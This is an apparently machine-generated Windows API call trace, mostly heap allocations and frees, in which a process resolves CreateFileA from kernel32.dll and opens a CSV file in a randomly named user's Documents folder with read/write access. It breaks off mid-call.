RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.647] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba270 [0179.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba270, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0179.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.648] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0179.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0179.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba270, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0179.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.649] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0179.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0179.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0179.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4f) returned 0x923b28 [0179.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", cchWideChar=79, lpMultiByteStr=0x923b28, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", lpUsedDefaultChar=0x0) returned 79 [0179.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0179.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.651] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\rdv9bzzuy is9hirae.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=79, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9e) returned 0x8f9058 [0179.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=79, lpWideCharStr=0x8f9058, cchWideChar=79 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv") returned 79 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0179.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.656] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0179.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.657] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0179.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0179.658] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, 